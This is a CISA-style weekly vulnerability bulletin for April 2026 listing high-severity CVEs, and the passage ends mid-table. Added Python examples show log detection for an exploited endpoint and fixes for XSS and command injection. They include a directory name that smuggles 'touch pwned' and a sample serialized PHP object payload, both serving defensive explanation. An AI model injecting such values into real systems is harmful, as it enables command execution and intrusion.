    <table style="display:none"><tr><td><a name="gd_top" id="gd_top"></a></td></tr></table>
    <![endif]-->
    <a name="gd_top" id="gd_top"></a>






    <ul>
    <li><strong>High</strong>: vulnerabilities with a CVSS base score of 7.0–10.0</li>
    <li><strong>Medium</strong>: vulnerabilities with a CVSS base score of 4.0–6.9</li>
    <li><strong>Low</strong>: vulnerabilities with a CVSS base score of 0.0–3.9</li>
    </ul>
    <div class="rss_item" style="margin-bottom: 2em;">
    <div class="rss_title" style="font-weight: bold; font-size: 120%; margin: 0 0 0.3em; padding: 0;"><a href="https://www.cisa.gov/news-events/bulletins/sb26-103" target="_blank" title="Vulnerability Summary for the Week of April 6, 2026" rel="noopener">Vulnerability Summary for the Week of April 6, 2026</a></div>
    <div class="rss_pub_date" style="font-size: 90%; font-style: italic; color: #666666; margin: 0 0 0.3em; padding: 0;">04/14/2026 08:00 AM EDT</div> <div class="rss_description" style="margin: 0 0 0.3em; padding: 0;">
    <div id=3D"high_v">
    <h2 id=3D"high_v_title">High Vulnerabilities</h2>
    <table class="table no-tablesaw" style="table-layout: fixed; width: 100%;" border="1" summary="High Vulnerabilities" align="center">
    <thead>

    <tr>
    <th class="vendor-product" style="width: 24%;" scope="col">
    <span class="primary-vendor">Primary</span><br><span class="primary-vendor">Vendor</span> -- Product</th>
    <th style="width: 44%;" scope="col">Description</th>
    <th style="width: 10%;" scope="col">Published</th>
    <th style="width: 8%;" scope="col">CVSS Score</th>
    <th style="width: 7%;" scope="col">Source Info</th>
    <th style="width: 7%;" scope="col">Patch Info</th>
    </tr>
    </thead>
    <tbody>

    <tr>
    <td class="vendor-product">nyariv--SandboxJS</td>
    <td>SandboxJS is a JavaScript sandboxing library. Prior to 0.8.36, SandboxJS blocks direct assignment to global objects (for example Math.random = ...), but this protection can be bypassed through an exposed callable constructor path: this.constructor.call(target, attackerObject). Because this.constructor resolves to the internal SandboxGlobal function and Function.prototype.call is allowed, attacker code can write arbitrary properties into host global objects and persist those mutations across sandbox instances in the same process. This vulnerability is fixed in 0.8.36.</td>
    <td>2026-04-06</td>
    <td>10</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34208" target="_blank" rel="noopener">CVE-2026-34208</a></td>
    <td><a href="https://github.com/nyariv/SandboxJS/security/advisories/GHSA-2gg9-6p7w-6cpj" target="_blank" rel="noopener">https://github.com/nyariv/SandboxJS/security/advisories/GHSA-2gg9-6p7w-6cpj</a><br></td>
    </tr>

    <tr>
    <td class="vendor-product">Davidtavarez--CF Image Hosting Script</td>
    <td>CF Image Hosting Script 1.6.5 allows unauthenticated attackers to download and decode the application database by accessing the imgdb.db file in the upload/data directory. Attackers can extract delete IDs stored in plaintext from the deserialized database and use them to delete all pictures via the d parameter.</td>
    <td>2026-04-12</td>
    <td>9.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2019-25709" target="_blank" rel="noopener">CVE-2019-25709</a></td>
    <td><a href="https://www.exploit-db.com/exploits/46094" target="_blank" rel="noopener">ExploitDB-46094</a><br><a href="https://davidtavarez.github.io/" target="_blank" rel="noopener">Official Product Homepage</a><br><a href="http://forum.codefuture.co.uk/showthread.php?tid=73141" target="_blank" rel="noopener">Product Reference</a><br><a href="https://www.vulncheck.com/advisories/cf-image-hosting-script-unauthorized-database-access" target="_blank" rel="noopener">VulnCheck Advisory: CF Image Hosting Script 1.6.5 Unauthorized Database Access</a><br></td>
    </tr>

    <tr>
    <td class="vendor-product">Beijing Topsec Network Security Technology Co., Ltd.--Tianxin Internet Behavior Management System</td>
    <td>Tianxin Internet Behavior Management System contains a command injection vulnerability in the Reporter component endpoint that allows unauthenticated attackers to execute arbitrary commands by supplying a crafted objClass parameter containing shell metacharacters and output redirection. Attackers can exploit this vulnerability to write malicious PHP files into the web root and achieve remote code execution with the privileges of the web server process. This vulnerability has been fixed in version NACFirmware_4.0.0.7_20210716.180815_topsec_0_basic.bin. Exploitation evidence was first observed by the Shadowserver Foundation on 2024-06-01 (UTC).</td>
    <td>2026-04-07</td>
    <td>9.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2021-4473" target="_blank" rel="noopener">CVE-2021-4473</a></td>
    <td><a href="https://www.cnvd.org.cn/flaw/show/CNVD-2021-41972" target="_blank" rel="noopener">https://www.cnvd.org.cn/flaw/show/CNVD-2021-41972</a><br><a href="https://www.cnvd.org.cn/patchInfo/show/280166" target="_blank" rel="noopener">https://www.cnvd.org.cn/patchInfo/show/280166</a><br><a href="https://cn-sec.com/archives/4631959.html" target="_blank" rel="noopener">https://cn-sec.com/archives/4631959.html</a><br><a href="https://avd.aliyun.com/detail?id=AVD-2021-890232" target="_blank" rel="noopener">https://avd.aliyun.com/detail?id=AVD-2021-890232</a><br><a href="https://www.vulncheck.com/advisories/tianxin-internet-behavior-management-system-command-injection-via-toquery-php" target="_blank" rel="noopener">https://www.vulncheck.com/advisories/tianxin-internet-behavior-management-system-command-injection-via-toquery-php</a><br></td>
    </tr>

    <tr>
    <td class="vendor-product">Contemporary Controls--BASControl20</td>
    <td>An attacker could use data obtained by sniffing the network traffic to forge packets in order to make arbitrary requests to Contemporary Controls BASC 20T.</td>
    <td>2026-04-09</td>
    <td>9.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-13926" target="_blank" rel="noopener">CVE-2025-13926</a></td>
    <td><a href="https://www.ccontrols.com/support/contacttech.htm" target="_blank" rel="noopener">https://www.ccontrols.com/support/contacttech.htm</a><br><a href="https://www.cisa.gov/news-events/ics-advisories/icsa-26-099-01" target="_blank" rel="noopener">https://www.cisa.gov/news-events/ics-advisories/icsa-26-099-01</a><br><a href="https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-099-01.json" target="_blank" rel="noopener">https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-099-01.json</a><br></td>
    </tr>

    <tr>
    <td class="vendor-product">SaturdayDrive--Ninja Forms - File Uploads</td>
    <td>The Ninja Forms - File Uploads plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'NF_FU_AJAX_Controllers_Uploads::handle_upload' function in all versions up to, and including, 3.3.26. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. Note: The vulnerability was partially patched in version 3.3.25 and fully patched in version 3.3.27.</td>
    <td>2026-04-07</td>
    <td>9.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-0740" target="_blank" rel="noopener">CVE-2026-0740</a></td>
    <td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0b606ded-ab50-486a-9337-97ee9f452f12?source=cve" target="_blank" rel="noopener">https://www.wordfence.com/threat-intel/vulnerabilities/id/0b606ded-ab50-486a-9337-97ee9f452f12?source=cve</a><br><a href="https://ninjaforms.com/extensions/file-uploads/" target="_blank" rel="noopener">https://ninjaforms.com/extensions/file-uploads/</a><br></td>
    </tr>

    <tr>
    <td class="vendor-product">IBM--Verify Identity Access Container</td>
    <td>IBM Verify Identity Access Container 11.0 through 11.0.2 and IBM Security Verify Access Container 10.0 through 10.0.9.1 and IBM Verify Identity Access 11.0 through 11.0.2 and IBM Security Verify Access 10.0 through 10.0.9.1 could allow a locally authenticated user to escalate their privileges to root due to execution with more privileges than required.</td>
    <td>2026-04-08</td>
    <td>9.3</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-1346" target="_blank" rel="noopener">CVE-2026-1346</a></td>
    <td><a href="https://www.ibm.com/support/pages/node/7268253" target="_blank" rel="noopener">https://www.ibm.com/support/pages/node/7268253</a><br></td>
    </tr>

    <tr>
    <td class="vendor-product">davidfcarr--Quick Playground</td>
    <td>The Quick Playground plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.1. This is due to insufficient authorization checks on REST API endpoints that expose a sync code and allow arbitrary file uploads. This makes it possible for unauthenticated attackers to retrieve the sync code, upload PHP files with path traversal, and achieve remote code execution on the server.</td>
    <td>2026-04-09</td>
    <td>9.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-1830" target="_blank" rel="noopener">CVE-2026-1830</a></td>
    <td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/308cd28a-a477-4bc6-a392-ad5a9eca1cb5?source=cve" target="_blank" rel="noopener">https://www.wordfence.com/threat-intel/vulnerabilities/id/308cd28a-a477-4bc6-a392-ad5a9eca1cb5?source=cve</a><br><a href="https://plugins.trac.wordpress.org/browser/quick-playground/trunk/api.php#L39" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/quick-playground/trunk/api.php#L39</a><br><a href="https://plugins.trac.wordpress.org/browser/quick-playground/trunk/expro-api.php#L419" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/quick-playground/trunk/expro-api.php#L419</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3500839%40quick-playground&new=3500839%40quick-playground&sfp_email=&sfph_mail=" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3500839%40quick-playground&new=3500839%40quick-playground&sfp_email=&sfph_mail</a><br></td>
    </tr>

    <tr>
    <td class="vendor-product">LibRaw--LibRaw</td>
    <td>A heap-based buffer overflow vulnerability exists in the x3f_thumb_loader functionality of LibRaw Commit d20315b. A specially crafted malicious file can lead to a heap buffer overflow. An attacker can provide a malicious file to trigger this vulnerability.</td>
    <td>2026-04-07</td>
    <td>9.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-20889" target="_blank" rel="noopener">CVE-2026-20889</a></td>
    <td><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2026-2358" target="_blank" rel="noopener">https://talosintelligence.com/vulnerability_reports/TALOS-2026-2358</a><br></td>
    </tr>

    <tr>
    <td class="vendor-product">LibRaw--LibRaw</td>
    <td>A heap-based buffer overflow vulnerability exists in the HuffTable::initval functionality of LibRaw Commit 0b56545 and Commit d20315b. A specially crafted malicious file can lead to a heap buffer overflow. An attacker can provide a malicious file to trigger this vulnerability.</td>
    <td>2026-04-07</td>
    <td>9.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-20911" target="_blank" rel="noopener">CVE-2026-20911</a></td>
    <td><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2026-2330" target="_blank" rel="noopener">https://talosintelligence.com/vulnerability_reports/TALOS-2026-2330</a></td>
    </tr>

    <tr>
    <td class="vendor-product">LibRaw--LibRaw</td>
    <td>A heap-based buffer overflow vulnerability exists in the lossless_jpeg_load_raw functionality of LibRaw Commit 0b56545 and Commit d20315b. A specially crafted malicious file can lead to a heap buffer overflow. An attacker can provide a malicious file to trigger this vulnerability.</td>
    <td>2026-04-07</td>
    <td>9.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-21413" target="_blank" rel="noopener">CVE-2026-21413</a></td>
    <td><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2026-2331" target="_blank" rel="noopener">https://talosintelligence.com/vulnerability_reports/TALOS-2026-2331</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Weaver Network Co., Ltd.--E-cology</td>
    <td>Weaver (Fanwei) E-cology 10.0 versions prior to 20260312 contain an unauthenticated remote code execution vulnerability in the /papi/esearch/data/devops/dubboApi/debug/method endpoint that allows attackers to execute arbitrary commands by invoking exposed debug functionality. Attackers can craft POST requests with attacker-controlled interfaceName and methodName parameters to reach command-execution helpers and achieve arbitrary command execution on the system. Exploitation evidence was first observed by the Shadowserver Foundation on 2026-03-31 (UTC).</td>
    <td>2026-04-07</td>
    <td>9.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-22679" target="_blank" rel="noopener">CVE-2026-22679</a></td>
    <td><a href="https://www.weaver.com.cn/cs/securityDownload.html#" target="_blank" rel="noopener">https://www.weaver.com.cn/cs/securityDownload.html#</a><br><a href="https://h4cker.zip/post/d5d211/" target="_blank" rel="noopener">https://h4cker.zip/post/d5d211/</a><br><a href="https://ti.qianxin.com/vulnerability/notice-detail/1760" target="_blank" rel="noopener">https://ti.qianxin.com/vulnerability/notice-detail/1760</a><br><a href="https://www.vulncheck.com/advisories/weaver-e-cology-unauthenticated-rce-via-dubboapi-debug-endpoint" target="_blank" rel="noopener">https://www.vulncheck.com/advisories/weaver-e-cology-unauthenticated-rce-via-dubboapi-debug-endpoint</a></td>
    </tr>
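    <tr><td colspan="6">
    Detection logic for the endpoint named in the entry above, as an added example; it is not code from Weaver or from any of the linked advisories. It assumes web-server access logs in combined format and runs over constructed sample lines. Comparing the path case-insensitively and without its query string is an assumption about evasion made here, not something the advisory states.

```python
import re
from collections import Counter

# Constructed sample lines in combined log format (not real traffic); the
# endpoint path is the one named in the CVE-2026-22679 description.
SAMPLE_LOG = """\
203.0.113.7 - - [31/Mar/2026:02:14:09 +0000] "POST /papi/esearch/data/devops/dubboApi/debug/method HTTP/1.1" 200 512 "-" "python-requests/2.31"
198.51.100.2 - - [31/Mar/2026:02:14:10 +0000] "GET /wui/index.html HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
203.0.113.7 - - [31/Mar/2026:02:14:11 +0000] "POST /papi/esearch/data/devops/dubboApi/debug/method HTTP/1.1" 500 0 "-" "python-requests/2.31"
192.0.2.9 - - [31/Mar/2026:02:15:00 +0000] "POST /PAPI/esearch/data/devops/dubboApi/debug/method?x=1 HTTP/1.1" 200 300 "-" "curl/8.0"
198.51.100.2 - - [31/Mar/2026:02:16:00 +0000] "GET /papi/esearch/data/devops/dubboApi/debug/method HTTP/1.1" 405 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Compared lower-cased and without the query string so that trivially varied
# probes are not missed (an assumption about evasion, not from the advisory).
DEBUG_ENDPOINT = "/papi/esearch/data/devops/dubboapi/debug/method"


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry


def is_debug_endpoint_hit(entry):
    path = entry["path"].split("?", 1)[0].lower()
    return path == DEBUG_ENDPOINT


def find_dubbo_debug_hits(log_text):
    """All requests to the debug endpoint as (ip, method, status, timestamp)."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and is_debug_endpoint_hit(entry):
            hits.append((entry["ip"], entry["method"], entry["status"], entry["ts"]))
    return hits


def posts_by_source(hits):
    """POSTs per source IP: the method the description says carries the
    interfaceName/methodName parameters. A 200 after a POST is the strongest
    signal; GETs are more likely probes or scanners and are left for triage."""
    return Counter(ip for ip, method, _, _ in hits if method == "POST")


if __name__ == "__main__":
    found = find_dubbo_debug_hits(SAMPLE_LOG)
    for hit in found:
        print(hit)
    print(dict(posts_by_source(found)))
```

    Because the parameters travel in the POST body, an access log can only show that the endpoint was reached; confirming command execution needs the application log or the request body from a WAF or reverse proxy. Any POST from outside the management network to this path on an unpatched instance should be treated as a compromise until proven otherwise, given the Shadowserver observation date above.
    </td></tr>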

    <tr>
    <td class="vendor-product">prosolution--ProSolution WP Client</td>
    <td>The ProSolution WP Client plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'proSol_fileUploadProcess' function in all versions up to, and including, 1.9.9. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.</td>
    <td>2026-04-08</td>
    <td>9.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-2942" target="_blank" rel="noopener">CVE-2026-2942</a></td>
    <td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3852aef6-42e7-4b71-a1ba-dd41284fd07b?source=cve" target="_blank" rel="noopener">https://www.wordfence.com/threat-intel/vulnerabilities/id/3852aef6-42e7-4b71-a1ba-dd41284fd07b?source=cve</a><br><a href="https://plugins.trac.wordpress.org/browser/prosolution-wp-client/trunk/public/class-prosolwpclient-public.php?rev=3331282#L993" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/prosolution-wp-client/trunk/public/class-prosolwpclient-public.php?rev=3331282#L993</a><br><a href="https://plugins.trac.wordpress.org/changeset/3484577/prosolution-wp-client" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/changeset/3484577/prosolution-wp-client</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Rukovoditel--Rukovoditel CRM</td>
    <td>A reflected cross-site scripting (XSS) vulnerability exists in Rukovoditel CRM version 3.6.4 and earlier in the Zadarma telephony API endpoint (/api/tel/zadarma.php). The application directly reflects user-supplied input from the 'zd_echo' GET parameter into the HTTP response without proper sanitization, output encoding, or content-type restrictions. The vulnerable code is: if (isset($_GET['zd_echo'])) exit($_GET['zd_echo']); An unauthenticated attacker can exploit this issue by crafting a malicious URL containing JavaScript payloads. When a victim visits the link, the payload executes in the context of the application within the victim's browser, potentially leading to session hijacking, credential theft, phishing, or account takeover. The issue is fixed in version 3.7, which introduces proper input validation and output encoding to prevent script injection.</td>
    <td>2026-04-11</td>
    <td>9.3</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-31845" target="_blank" rel="noopener">CVE-2026-31845</a></td>
    <td><a href="https://forum.rukovoditel.net/viewtopic.php?p=22499#p22499" target="_blank" rel="noopener">https://forum.rukovoditel.net/viewtopic.php?p=22499#p22499</a></td>
    </tr>
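    <tr><td colspan="6">
    An added illustration of the three missing controls the description lists (input validation, output encoding, content-type restriction), written here as a Python analogue of the one-line PHP handler; it is not Rukovoditel's code nor its 3.7 fix. That Zadarma's verification value is short and alphanumeric is an assumption of this example, to be checked against the API contract before reusing the pattern.

```python
import html
import re

# Allow-list for the echoed challenge. That the value is short and
# alphanumeric is an assumption made here, not a documented contract.
ZD_ECHO_RE = re.compile(r"[A-Za-z0-9]{1,64}")

PLAIN = {"Content-Type": "text/plain; charset=UTF-8",
         "X-Content-Type-Options": "nosniff"}


def zd_echo_vulnerable(params):
    """Analogue of: if (isset($_GET['zd_echo'])) exit($_GET['zd_echo']);
    PHP answers with text/html by default, so markup in the value is rendered.
    Returns (status, headers, body) like a tiny WSGI handler would."""
    if "zd_echo" in params:
        return 200, {"Content-Type": "text/html; charset=UTF-8"}, params["zd_echo"]
    return 404, dict(PLAIN), ""


def zd_echo_hardened(params):
    """Three independent controls: allow-list the input, answer as text/plain,
    and forbid MIME sniffing. Any one stops script execution; keeping all
    three means a later change to one of them does not reopen the hole."""
    value = params.get("zd_echo", "")
    if not ZD_ECHO_RE.fullmatch(value):
        return 400, dict(PLAIN), "bad request"
    return 200, dict(PLAIN), value


def echo_as_html(value):
    """If a value ever has to be embedded in an HTML body instead, encode it
    for that context; this is the output-encoding leg of the fix."""
    return html.escape(value, quote=True)
```

    The content-type leg matters on its own: a `text/plain` reply with `nosniff` is never parsed as a document, so even an encoding slip elsewhere does not become script execution.
    </td></tr>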

    <tr>
    <td class="vendor-product">chamilo--chamilo-lms</td>
    <td>Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, Chamilo LMS contains an OS Command Injection vulnerability in the file move function. The move() function in fileManage.lib.php passes user-controlled path values directly into exec() shell commands without using escapeshellarg(). When a user moves a document via document.php, the move_to POST parameter - which only passes through Security::remove_XSS() (an HTML-only filter) - is concatenated directly into shell commands such as exec("mv $source $target"). By default, Chamilo allows all authenticated users to create courses (allow_users_to_create_courses = true). Any user who is a teacher in a course (including self-created courses) can move documents, making this vulnerability exploitable by any authenticated user. The attacker must first place a directory with shell metacharacters in its name on the filesystem (achievable via Course Backup Import), then move a document into that directory to trigger arbitrary command execution as the web server user (www-data). This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.</td>
    <td>2026-04-10</td>
    <td>9.1</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-32892" target="_blank" rel="noopener">CVE-2026-32892</a></td>
    <td><a href="https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-59cv-qh65-vvrr" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-59cv-qh65-vvrr</a><br><a href="https://github.com/chamilo/chamilo-lms/commit/3597b19b73d73d681e4fb503285e9bbfe71714bf" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/commit/3597b19b73d73d681e4fb503285e9bbfe71714bf</a><br><a href="https://github.com/chamilo/chamilo-lms/commit/62671e5e268f235cddfba704edee90f35c234df1" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/commit/62671e5e268f235cddfba704edee90f35c234df1</a></td>
    </tr>
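    <tr><td colspan="6">
    The exec("mv $source $target") pattern above and the two ways of closing it, as an added example in Python rather than PHP; it is not Chamilo's patch (see the linked commits for that). shlex.quote() stands in for escapeshellarg() and shutil.move() for rename(). The directory name is constructed, and nothing in the block runs a shell, so the injected command is shown but never executed.

```python
import os
import shlex
import shutil
import tempfile

# Characters the shell treats specially. An HTML-oriented filter such as
# Security::remove_XSS() leaves most of them alone, which is the whole bug.
SHELL_META = set(";|&$`<>()\n")


def has_shell_metachars(path):
    return any(c in SHELL_META for c in path)


def move_command_vulnerable(source, target):
    """The reported pattern, exec("mv $source $target"): raw interpolation."""
    return f"mv {source} {target}"


def move_command_hardened(source, target):
    """shlex.quote() plays the role of PHP's escapeshellarg(): each argument
    becomes exactly one shell word, whatever characters it contains."""
    return f"mv {shlex.quote(source)} {shlex.quote(target)}"


def move_without_shell(source, target_dir):
    """Best fix: no shell at all (PHP's rename() is the equivalent)."""
    shutil.move(source, os.path.join(target_dir, os.path.basename(source)))


def demo():
    """Build both command strings for a directory whose name carries an
    injected command, then move the file the safe way. Returns what was seen."""
    with tempfile.TemporaryDirectory() as root:
        evil_dir = os.path.join(root, "x; touch pwned")  # attacker-chosen name
        os.mkdir(evil_dir)
        src = os.path.join(root, "doc.txt")
        open(src, "w").close()

        vuln = move_command_vulnerable(src, evil_dir)
        safe = move_command_hardened(src, evil_dir)
        move_without_shell(src, evil_dir)

        return {
            "flagged": has_shell_metachars(evil_dir),
            # Whitespace-split words of each string. In a real shell the ';'
            # inside the first one ends mv and starts 'touch pwned'; in the
            # second the quoting keeps the whole directory name one argument.
            "vulnerable_argv": shlex.split(vuln),
            "hardened_argv": shlex.split(safe),
            "moved_ok": os.path.isfile(os.path.join(evil_dir, "doc.txt")),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

    The precondition the description gives, a directory with metacharacters already on disk, is what has_shell_metachars() would catch at import time; quoting or avoiding the shell removes the need to trust file names at all.
    </td></tr>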

    <tr>
    <td class="vendor-product">wpeverest--Everest Forms Contact Form, Payment Form, Quiz, Survey &amp; Custom Form Builder</td>
    <td>The Everest Forms plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.4.3 via deserialization of untrusted input from form entry metadata. This is due to the html-admin-page-entries-view.php file calling PHP's native unserialize() on stored entry meta values without passing the allowed_classes parameter. This makes it possible for unauthenticated attackers to inject a serialized PHP object payload through any public Everest Forms form field. The payload survives sanitize_text_field() sanitization (serialization control characters are not stripped) and is stored in the wp_evf_entrymeta database table. When an administrator views entries or views an individual entry, the unsafe unserialize() call processes the stored data without class restrictions.</td>
    <td>2026-04-08</td>
    <td>9.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-3296" target="_blank" rel="noopener">CVE-2026-3296</a></td>
    <td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2693ae37-790d-4b18-a9ec-054c8c27b8bc?source=cve" target="_blank" rel="noopener">https://www.wordfence.com/threat-intel/vulnerabilities/id/2693ae37-790d-4b18-a9ec-054c8c27b8bc?source=cve</a><br><a href="https://plugins.trac.wordpress.org/browser/everest-forms/tags/3.4.3/includes/admin/views/html-admin-page-entries-view.php#L133" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/everest-forms/tags/3.4.3/includes/admin/views/html-admin-page-entries-view.php#L133</a><br><a href="https://plugins.trac.wordpress.org/browser/everest-forms/trunk/includes/admin/views/html-admin-page-entries-view.php#L133" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/everest-forms/trunk/includes/admin/views/html-admin-page-entries-view.php#L133</a><br><a href="https://plugins.trac.wordpress.org/browser/everest-forms/tags/3.4.3/includes/evf-core-functions.php#L5594" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/everest-forms/tags/3.4.3/includes/evf-core-functions.php#L5594</a><br><a href="https://plugins.trac.wordpress.org/changeset/3489938/everest-forms/tags/3.4.4/readme.txt?old=3464753&old_path=everest-forms%2Ftags%2F3.4.3%2Freadme.txt" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/changeset/3489938/everest-forms/tags/3.4.4/readme.txt?old=3464753&old_path=everest-forms%2Ftags%2F3.4.3%2Freadme.txt</a><br><a href="https://plugins.trac.wordpress.org/changeset?old_path=/everest-forms/tags/3.4.3&new_path=/everest-forms/tags/3.4.4" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/changeset?old_path=/everest-forms/tags/3.4.3&new_path=/everest-forms/tags/3.4.4</a></td>
    </tr>
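    <tr><td colspan="6">
    An added example, not Everest Forms or Wordfence code: a small parser for PHP's serialize() format that reports every class a stored value would instantiate, next to a rough stand-in for sanitize_text_field() that shows why such a payload passes through untouched. The class name in the constructed payload is hypothetical, and the sanitizer stand-in is deliberately not a faithful port of the WordPress function.

```python
import re

# Constructed payload of the shape the description gives: one object of a
# hypothetical class with a single public property. No gadget chain implied.
PAYLOAD = 'O:10:"Evil_Class":1:{s:3:"cmd";s:2:"id";}'


class PHPSerialParser:
    """Minimal recursive-descent parser for PHP serialize() output, written
    here to audit stored values. Collects every class named by an O: or C:
    token. Assumes ASCII input (PHP lengths are byte counts)."""

    def __init__(self, data):
        self.s, self.i, self.classes = data, 0, []

    def parse(self):
        value = self.value()
        if self.i != len(self.s):
            raise ValueError("trailing data after value")
        return value

    def expect(self, ch):
        if self.s[self.i] != ch:
            raise ValueError(f"expected {ch!r} at offset {self.i}")
        self.i += 1

    def read_until(self, ch):
        j = self.s.index(ch, self.i)
        token, self.i = self.s[self.i:j], j + 1
        return token

    def string_body(self, terminator=";"):
        n = int(self.read_until(":"))
        self.expect('"')
        text, self.i = self.s[self.i:self.i + n], self.i + n
        self.expect('"')
        self.expect(terminator)
        return text

    def members(self, count):
        self.expect("{")
        out = {}
        for _ in range(count):
            key = self.value()
            out[key] = self.value()
        self.expect("}")
        return out

    def value(self):
        tag, self.i = self.s[self.i], self.i + 1
        if tag == "N":
            self.expect(";")
            return None
        self.expect(":")
        if tag == "b":
            return self.read_until(";") == "1"
        if tag == "i":
            return int(self.read_until(";"))
        if tag == "d":
            return float(self.read_until(";"))
        if tag == "s":
            return self.string_body()
        if tag == "a":
            return self.members(int(self.read_until(":")))
        if tag == "O":
            name = self.string_body(terminator=":")
            self.classes.append(name)
            return ("object", name, self.members(int(self.read_until(":"))))
        if tag == "C":  # Serializable blob; the class is still instantiated
            name = self.string_body(terminator=":")
            self.classes.append(name)
            n = int(self.read_until(":"))
            self.expect("{")
            blob, self.i = self.s[self.i:self.i + n], self.i + n
            self.expect("}")
            return ("custom", name, blob)
        raise ValueError(f"unknown type tag {tag!r}")


def classes_in_php_serialized(data):
    parser = PHPSerialParser(data)
    parser.parse()
    return parser.classes


def sanitize_text_field_like(value):
    """Rough stand-in for WordPress sanitize_text_field() (strip tags and
    control characters, collapse whitespace), not a faithful port. It shows
    that ':' ';' '{' '}' and quotes, which the format needs, pass through."""
    value = re.sub(r"<[^>]*>", "", value)
    value = re.sub(r"[\x00-\x1f\x7f]", "", value)
    return re.sub(r"\s+", " ", value).strip()


def is_safe_to_unserialize(value, allowed_classes=()):
    """What unserialize($v, ['allowed_classes' => [...]]) enforces, done up
    front: reject malformed data and any class outside the allow-list."""
    try:
        classes = classes_in_php_serialized(value)
    except (ValueError, IndexError):
        return False
    return all(name in allowed_classes for name in classes)
```

    Run over a dump of the wp_evf_entrymeta table, classes_in_php_serialized() lists which stored rows would instantiate a class on the next admin page view, which is the triage question after patching. Values that are pure arrays and scalars (an empty class list) are what the plugin legitimately stores.
    </td></tr>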

    <tr>
    <td class="vendor-product">chamilo--chamilo-lms</td>
    <td>Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, the default password reset mechanism generates tokens using sha1($email) with no random component, no expiration, and no rate limiting. An attacker who knows a user's email can compute the reset token and change the victim's password without authentication. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.</td>
    <td>2026-04-10</td>
    <td>9.4</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33707" target="_blank" rel="noopener">CVE-2026-33707</a></td>
    <td><a href="https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-f27g-66gq-g7v2" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-f27g-66gq-g7v2</a><br><a href="https://github.com/chamilo/chamilo-lms/commit/078d7e5b77679fa7ccfcd6783bd5cc683db0bda8" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/commit/078d7e5b77679fa7ccfcd6783bd5cc683db0bda8</a><br><a href="https://github.com/chamilo/chamilo-lms/commit/750a45312a0d5c3ad60dbfbd0d959ca40be4a18c" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/commit/750a45312a0d5c3ad60dbfbd0d959ca40be4a18c</a></td>
    </tr>
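    <tr><td colspan="6">
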